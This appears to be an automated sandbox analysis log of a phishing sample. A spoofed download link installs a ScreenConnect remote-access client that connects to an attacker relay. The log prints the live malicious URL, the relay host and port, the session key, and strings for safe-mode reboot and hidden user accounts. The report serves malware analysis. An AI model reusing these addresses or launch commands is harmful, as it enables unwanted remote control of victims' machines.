Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp			Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\user.config

PE file does not import any functions

Source: bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp.0.dr

Static PE information: No import functions for PE file found

PE file overlay found

Source: bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp.0.dr

Static PE information: Data appended to the last section found

Source: ScreenConnect.WindowsBackstageShell.exe.14.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.14.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.14.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.14.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.14.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: classification engine

Classification label: mal68.evad.win@46/81@7/5

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r="
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\Downloads\support.Client.exe "C:\Users\user\Downloads\support.Client.exe"
Source: C:\Users\user\Downloads\support.Client.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User"
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\Downloads\support.Client.exe "C:\Users\user\Downloads\support.Client.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Users\user\Downloads\support.Client.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User"
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System"

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: chromecache_128.1.dr	Static PE information: real checksum: 0x177d1 should be: 0x175ce
Source: bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp.0.dr	Static PE information: real checksum: 0x177d1 should be: 0x48de
Source: Unconfirmed 974768.crdownload.0.dr	Static PE information: real checksum: 0x177d1 should be: 0x175ce

Source: Email	JoeBoxAI: AI detected Brand spoofing attempt in URL: URL: https://cp9856.chelokipotlester.icu
Source: Email	JoeBoxAI: AI detected Typosquatting in URL: URL: https://cp9856.chelokipotlester.icu
Source: Email	JoeBoxAI: AI detected suspicious URL: URL: https://cp9856.chelokipotlester.icu

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\Downloads\support.Client.exe (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: Chrome Cache Entry: 128	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\Downloads\Unconfirmed 974768.crdownload	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\Downloads\bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.ClientService.exe	Jump to dropped file

Source: ScreenConnect.ClientService.dll0.14.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: ScreenConnect.ClientService.dll.14.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1949508964.000000001BB02000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.exe, 00000012.00000002.1943559410.0000000002E62000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000014.00000002.2409619705.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000015.00000002.2004992616.00000000010D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.14.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll0.14.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll0.14.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll.14.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 212A1610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 212BB220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Memory allocated: C80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Memory allocated: 1AA50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Memory allocated: 1480000 memory reserve \| memory write watch
